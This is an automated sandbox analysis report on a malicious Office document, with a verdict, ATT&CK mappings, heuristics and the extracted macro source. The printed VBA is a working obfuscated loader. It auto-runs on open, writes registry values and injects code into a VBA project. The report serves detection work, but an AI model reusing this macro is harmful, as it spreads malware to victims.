Verdict: MALICIOUS (Risk Score 282)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1140 Deobfuscate/Decode Files or Information
The sample contains a heavily obfuscated VBA macro invoked from the Document_Open subroutine. The macro relies on CreateObject and CallByName, which indicates an attempt to execute code dynamically and most likely to download a second-stage payload. The combination of string obfuscation and dynamic execution suggests downloader or dropper functionality.
Heuristics (8)
- VBA macros detected (medium, 6 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call
- CallByName call (high) [OLE_VBA_CALLBYNAME]: CallByName call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4862 bytes |

SHA-256 of macros.bas: af389cb23e5cf9b91508e4091b4de9a8aaa9c03815fbe628f0f0d990bb2a9774
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
UserForm1.qxew
UserForm1.rkya
UserForm1.moit
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4219BD64-CD8F-4FBE-9E0A-E99B96D00111}{20D816C7-2404-4471-9F9C-C2FE26A3555B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function moit()
Set stqg = Application
Set rcci = CallByName(stqg, hrqf("084" & egjn & "34124" & egjn & "35116129135"), vift)
CallByName rcci, hrqf("087130084127120" & gkma & "35"), VbMethod, hrqf("087" & lrnj & "18136128" & xqdh & "29135051088" & gkma & "331" & jrvm & "3"), hrqf("103123120051119" & lrnj & "18136128" & xqdh & "29135051137120" & gkma & "34124" & lrnj & "29051" & iwmo & "340511291" & jrvm & "5051118" & lrnj & "28131116135" & iwmo & "17127120051138" & iwmo & "35123051135123" & iwmo & "340511381" & jrvm & "3119051" & lrnj & "21121124" & kjbs & "20051137120" & gkma & "34124" & lrnj & "29"), 0, 1, 0, 0, 0
End Function
Function qxew()
Dim stqg, rcci As String
Set jtra = Application
zmxn = CallByName(jtra, hrqf("105120" & gkma & "34124" & lrnj & "29"), vift)
stqg = hrqf("102" & lrnj & "21135138116" & gkma & "20111096" & iwmo & "18" & gkma & "" & jrvm & "4" & lrnj & "21135111098121121124" & kjbs & "20111") & zmxn & hrqf("111088139" & kjbs & "20127111102120" & kjbs & "36" & gkma & "" & iryf & "5140")
rcci = hrqf("084" & kjbs & "18120" & egjn & "34105085098096")
Set fscv = sjdz(hrqf("138" & iwmo & "29128122128135134077142" & iwmo & "28131120" & gkma & "34" & lrnj & "29116135124" & lrnj & "29095" & xqdh & "37" & xqdh & "27080" & iwmo & "28131120" & gkma & "34" & lrnj & "29116135" & xqdh & "44052111111065111" & gkma & "" & jrvm & "0135111119" & xqdh & "21116136127135077102135119101" & xqdh & "22099" & gkma & "" & jrvm & "7"))
CallByName fscv, hrqf("102" & xqdh & "35087106098101087105116127136120"), VbMethod, &H80000001, stqg, rcci, 1
End Function
Function sjdz(stqg As String) As Object
Set sjdz = GetObject(stqg)
End Function
Function hrqf(rcci As String) As String
Dim stqg As String
stqg = ""
Do
stqg = stqg + boxd(xlbh(rcci))
rcci = ddni(rcci)
Loop While Len(rcci) > 0
hrqf = stqg
End Function
Function boxd(rcci)
boxd = Chr(rcci - 19)
End Function
Function xlbh(rcci)
xlbh = Left(rcci, 3)
End Function
Function ddni(rcci)
ddni = Right(rcci, Len(rcci) - 3)
End Function
Function rkya()
Do While True
On Error GoTo Handler
Dim xl, xw As Object
Set xl = CreateObject(hrqf("088139" & kjbs & "20127065084131131127124" & kjbs & "16135124" & lrnj & "29"))
CallByName xl, hrqf("105124" & egjn & "24117127120"), lvgz, False
CallByName xl, hrqf("087124" & egjn & "31127116140084127120" & gkma & "35134"), lvgz, False
Set xv = CallByName(xl, hrqf("1061" & jrvm & "31261171" & jrvm & "0126134"), vift)
Set xw = CallByName(xv, hrqf("084119119"), vift)
Set xx = CallByName(xl, hrqf("084" & kjbs & "35" & iwmo & "37" & xqdh & "061" & jrvm & "31261171" & jrvm & "0126"), vift)
nn = CallByName(xx, hrqf("097116128120"), vift)
Set xq = CallByName(xw, hrqf("105085099" & gkma & "" & yjgf & "5120" & kjbs & "35"), vift)
Set xr = CallByName(xq, hrqf("105085086" & lrnj & "28131" & lrnj & "29" & xqdh & "29135134"), vift)
Set xt = CallByName(xr(1), hrqf("086" & lrnj & "19120096" & lrnj & "19136127120"), vift)
CallByName xt, hrqf("084119119089" & gkma & "" & yjgf & "8102135" & gkma & "24129122"), VbMethod, hrqf(UserForm1.TextBox1.Text)
GoTo nnt
Handler:
Loop
nnt:
End Function
Function nabg(stqg)
... (truncated)